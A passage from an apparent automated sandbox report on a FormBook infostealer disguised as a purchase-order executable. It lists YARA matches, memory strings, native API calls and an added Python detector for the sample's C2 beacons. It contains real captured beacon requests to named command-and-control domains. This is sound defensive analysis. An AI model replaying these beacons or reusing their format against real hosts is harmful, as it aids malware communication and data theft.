Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp | String found in binary or memory: http://yuyabo.com/
Note on these strings: the explorer.exe entries all come from one dump of explorer.exe's own memory (00000002.00000000...) and are font-vendor and licence URLs typical of font metadata, not indicators of this sample. Only the strings found in the injected ipconfig.exe process (www.hemparcade.com, which is also one of the beacon hosts above, and yuyabo.com) are attributable to the sample.
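
The thirteen requests above share one shape: a plain GET with no User-Agent and `Connection: close`, a short path (`/igqu/`), and a query of exactly two parameters, the first a long base64 blob and the second a short token, rotated across thirteen unrelated domains (most of which answered 403 or 404, as the Snort alert and the nginx response show). The path is the useful pivot: one build keeps it constant while the host changes. The following Python is an added example, not Joe Sandbox code, that parses raw requests, scores them against that shape and groups beacon hosts by path. Three of the requests are copied from the report; the two benign ones are constructed. The thresholds (path of two to eight lower-case alphanumerics, a base64 value of at least 32 characters, a token of up to twelve) are this example's assumptions fitted to the observed traffic, not a published FormBook signature, and the parameter names (7nExDDz, znedzJ) are deliberately not matched because they vary between builds.

```python
"""Flag FormBook-style C2 beacons in raw HTTP requests and pivot on the shared path (added example)."""
import base64
import re
from typing import Dict, List, Tuple

PATH_RE = re.compile(r"/[a-z0-9]{2,8}/")            # e.g. /igqu/  (threshold is an assumption)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
SHORT_TOKEN_RE = re.compile(r"[A-Za-z0-9]{2,12}")     # e.g. zZ08lr (threshold is an assumption)


def parse_request(raw: str) -> Dict:
    """Minimal HTTP/1.1 request parser: request line, headers, and an un-decoded query string."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    # Split by hand: urllib's parse_qs would turn '+' into a space and unquote
    # '%xx', but the first value here is raw base64 in which '+' and '/' are data.
    params: List[Tuple[str, str]] = []
    for part in (query.split("&") if query else []):
        key, _, value = part.partition("=")
        params.append((key, value))
    return {"method": method, "path": path, "params": params,
            "headers": headers, "host": headers.get("host", "")}


def looks_base64(value: str, min_len: int = 32) -> bool:
    """True for a well-formed, padded base64 string of at least min_len characters."""
    if len(value) < min_len or len(value) % 4 or not B64_RE.fullmatch(value):
        return False
    try:
        base64.b64decode(value, validate=True)
    except ValueError:          # binascii.Error is a ValueError
        return False
    return True


def beacon_indicators(req: Dict) -> Dict[str, bool]:
    params = req["params"]
    return {
        "get_without_user_agent": req["method"] == "GET" and "user-agent" not in req["headers"],
        "connection_close": req["headers"].get("connection", "").lower() == "close",
        "short_path_segment": PATH_RE.fullmatch(req["path"]) is not None,
        "two_params_base64_then_token": (
            len(params) == 2
            and looks_base64(params[0][1])
            and SHORT_TOKEN_RE.fullmatch(params[1][1]) is not None
        ),
    }


def is_formbook_beacon(req: Dict) -> bool:
    return all(beacon_indicators(req).values())


def pivot_by_path(reqs: List[Dict]) -> Dict[str, List[str]]:
    """Group beacon hosts by URI path: one build rotates one path across many domains."""
    groups: Dict[str, set] = {}
    for req in reqs:
        if is_formbook_beacon(req):
            groups.setdefault(req["path"], set()).add(req["host"])
    return {path: sorted(hosts) for path, hosts in groups.items()}


# First three copied from the report's Networking section; last two constructed as benign controls.
REQUESTS = [
    "GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1\r\n"
    "Host: www.maninhatphoto.com\r\nConnection: close\r\n\r\n",
    "GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1\r\n"
    "Host: www.placeduconfort.com\r\nConnection: close\r\n\r\n",
    "GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1\r\n"
    "Host: www.heartandcrowncloset.com\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
    "GET /api/v1/items?page=2&sort=asc HTTP/1.1\r\nHost: api.example.com\r\nConnection: close\r\n\r\n",
]


if __name__ == "__main__":
    parsed = [parse_request(r) for r in REQUESTS]
    for req in parsed:
        print(req["host"], req["path"], is_formbook_beacon(req), beacon_indicators(req))
    print("hosts per path:", pivot_by_path(parsed))
```

The second benign request is there on purpose: it has no User-Agent and uses `Connection: close`, which alone would fire a naive rule; it is the combination with the short path and the base64-then-token query that separates the beacons.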

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Purchase Order 40,7045$.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Purchase Order 40,7045$.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417BA0 NtCreateFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417C50 NtReadFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417CD0 NtClose,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417D80 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417C4C NtReadFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00417CCA NtClose,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FCB040 NtSuspendThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9A10 NtQuerySection,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FCA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FC9560 NtWriteFile,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FCAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EBA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EBB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EBA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EBA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EB9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EBAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B17BA0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B17CD0 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B17C50 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B17CCA NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B17C4C NtReadFile,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E9969
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E91F9
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E8D64
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E9D51
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E9597
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E07F6
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041C16E
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00408A40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00408A3B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00402D8A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041BF03
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB20A0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9B090
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAA830
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01041002
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0105E824
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010520A8
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FA4120
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010528EC
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F8F900
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01052B28
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0104DBD2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010403DA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0103FA2B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FBEBB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010522AE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FAAB40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01052D07
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01051D55
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_010525DD
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9841F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F9D5E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0104D466
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00F80D20
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FA6E30
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0105DFCE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01051FF1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0104D616
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_01052EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F422AE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F2FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F3DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F303DA
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EAEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E9AB40
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F42B28
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F428EC
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F420A8
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E8B090
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F4E824
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F31002
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E7F900
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F42EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E96E30
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F3D616
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F41FF1
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F4DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F3D466
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E8841F
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E8D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F425DD
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02EA2581
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F41D55
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02E70D20
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02F42D07
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B08A3B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B08A40
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1C16E
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B02FB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1BF03
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B02D90
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B02D8A
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013E0550 appears 47 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013EDBFD appears 32 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013DB9F5 appears 624 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 00F8B150 appears 54 times
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 02E7B150 appears 48 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
